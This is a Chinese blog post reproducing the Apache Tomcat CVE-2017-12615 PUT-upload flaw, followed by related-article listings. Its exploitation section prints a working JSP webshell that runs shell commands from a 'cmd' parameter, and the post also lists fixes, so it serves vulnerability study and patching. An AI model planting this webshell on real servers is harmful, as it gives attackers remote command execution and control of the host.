Apache Tomcat任意文件上传漏洞(CVE-2017-12615)

最新推荐文章于 2025-11-04 21:18:25 发布
原创 最新推荐文章于 2025-11-04 21:18:25 发布 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tomcat #渗透测试 #漏洞复现

本文详细介绍了当Tomcat在Windows环境下启用HTTP PUT请求时存在的0X00漏洞,攻击者可借此上传恶意JSP文件,执行任意代码,造成数据泄露或服务器权限被获取。文章提供了漏洞利用示例代码,并提出了修复方案,包括修改配置文件、禁用PUT方法及升级至最新版本。

0X00漏洞概述

当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

0X01影响范围

Apache Tomcat 7.0.07.0.81

0X02漏洞利用

1.抓包,put上传一个jsp木马
在这里插入图片描述

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

2.访问网站根目录下test.jsp
在这里插入图片描述

0X03修复方案

1.将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true
2.禁用put方法
3.升级至最高版本
Alluresec
关注
文件上传漏洞
谢公子的博客
09-29 1万+
目录 文件上传漏洞 文件上传的过滤 上传文件过滤的绕过 上传html文件 文件上传的防御 upload-libs 文件上传漏洞 文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 文件上传漏洞条件: 上传的文件能被Web服务器当做脚本来执行 我们能够访问到上传文件的路径 服务器上传文件命名规则: 第一...
Tomcat任意文件上传漏洞CVE-2017-12615
bring_coco的博客
03-24 888
漏洞介绍 漏洞描述 当存在漏洞Tomcat运行在Windows主机上,并且启用了HTTP PUT请求方法(例如:将readonly初始化参数由默认值设置为false),攻击者将有可能通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将被服务器执行,导致服务器上的数据泄露或获取服务器权限 漏洞影响 泄露用户代码数据,或用户服务器被攻击者控制 影响版本 Apache Tomcat 7.0.0-7.0.79 漏洞利用 环境:vulhub(ip:192.16
Tomcat任意文件上传漏洞(CVE-2017-12615)
qq_51331767的博客
02-12 657
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中远程代码执行漏洞CVE-2017-12615)。一定条件下,攻击者可以利用该漏洞,通过上传的jsp文件,在服务器上执行任意代码,导致数据泄露或权限被获取,存在高安全风险。
tomcat漏洞任意文件上传CVE-2017-12615
weixin_53711701的博客
12-24 3390
tomcat漏洞任意文件上传CVE-2017-12615
任意文件上传漏洞
最新发布
2502_91116367的博客
11-04 374
摘要:任意文件上传漏洞危害严重,攻击者可上传恶意脚本到可解析目录从而控制服务器。示例PHP代码未对上传文件类型校验,直接将用户提交文件保存至服务器,存在安全隐患。代码流程包括:检测上传错误、定义存储目录、拼接目标路径、移动临时文件并反馈结果,但缺乏文件类型检查等安全措施,容易导致漏洞利用。
apache 文件上传 (CVE-2017-15715)漏洞复现
weixin_42675091的博客
09-02 2729
apache 文件上传 (CVE-2017-15715)漏洞复现
Apache Tomcat任意文件上传漏洞(CVE-2017-12615)
ranzi.
01-31 2380
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616。漏洞影响:上传包含任意代码的文件,并且能被服务器执行。放包后再次访问“1.jsp”,发现存在了。
Apache Tomcat任意文件上传漏洞CVE-2017-12615
weixin_43736941的博客
07-28 786
漏洞描述 当存在漏洞Tomcat 运行在 Windows 主机上,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。 影响范围 Apache Tomcat 7.0.07.0.79 复现过程 1.环境搭建,在CenOs7靶机 ip 172.16.2.129 上利用doc
Tomcat 任意写入文件漏洞CVE-2017-12615
ANOrange的博客
03-29 701
Tomcat 任意写入文件漏洞CVE-2017-12615漏洞复现
Tomcat PUT方法任意写文件漏洞CVE-2017-12615
weixin_45653478的博客
05-02 2050
Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据写入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件写入任意位置,从而实现任意文件写入。
Tomcat 任意文件上传漏洞CVE-2017-12615
jiji_king的博客
07-04 586
由于配置不当(非默认配置),将配置文件conf/web.xml中的readonly设置为了 false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀的上传,但可以绕过,绕过方法多种。靶场搭建为docker环境下的vulhub靶场环境开启后访问靶机 抓包,尝试上传3.txt文件,并访问。 返回201 上传成功! 访问: 访问成功!上传木马,用蚁剑连接(注意jsp被过滤了,要绕过) 连接成功! 测试结束!...
Apache文件上传漏洞
guishengyx的博客
10-19 485
vulfocus靶场
Tomcat任意文件上传漏洞CVE-2017-12615
weixin_30401605的博客
07-25 228
文章来源:https://blog.csdn.net/qq1124794084/article/details/78044756 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 CVE-2017-12615漏洞利用需要在Windows环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x版本内web.xml配置文件内默认...
Tomcat任意文件上传CVE-2017-12615漏洞复现(附POC)
byt8563的博客
06-30 5160
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞漏洞编号:CVE-2017-12615漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
tomcat put方法任意写文件漏洞tomcat弱口令漏洞复现
DXfighting_的博客
04-15 2464
tomcat put方法任意写文件漏洞 漏洞的产生是由于配置不当(非默认配置),将配置文件(conf/web.xml)中的readonly设置为了false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀,不过对于不同平台有多种绕过方法 开启漏洞环境 访问web,使用bp抓包,修改为如图PUT请求,PUT /x.jsp/ HTTP/1.1方法进行绕过 使用冰蝎连接 tomcat弱口令漏洞 启动环境 访问网页后台,爆破知道后台用户名密码为 tomcat tom...
Tomcat 任意文件上传漏洞CVE-2017-12615)实验报告》
2401_82714285的博客
12-16 326
当启用了 PUT 方法且未对上传文件的后缀名进行严格限制时,攻击者可以构造恶意的文件上传请求,将任意文件上传到服务器指定目录下。若上传的是恶意脚本文件(如 JSP 脚本),攻击者则可通过访问该脚本在服务器上执行任意命令,获取服务器权限,严重危害服务器安全。本实验旨在深入理解 Tomcat 任意文件上传漏洞CVE-2017-12615)的原理、危害及利用方式,通过实际操作复现漏洞,从而提升对服务器安全漏洞的认知与防范能力。第五步:查看1.jsp 文件路径root下的1.jsp。
漏洞分析 | Apache Struts文件上传漏洞CVE-2024-53677
WangsuSecurity的博客
12-31 2856
目前该漏洞POC状态已在互联网公开,网宿评分:高危,CVSS 3.0 评分:8.1
深入解析Apache Tomcat文件包含漏洞CVE-2020-1938)
本篇将详细解读关于Apache Tomcat服务器所面临的一个特定安全漏洞——CNVD-2020-10487(对应CVE-2020-1938)。 **Apache Tomcat介绍** Apache TomcatApache软件基金会的Jakarta项目的一部分,主要用于运行Java...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值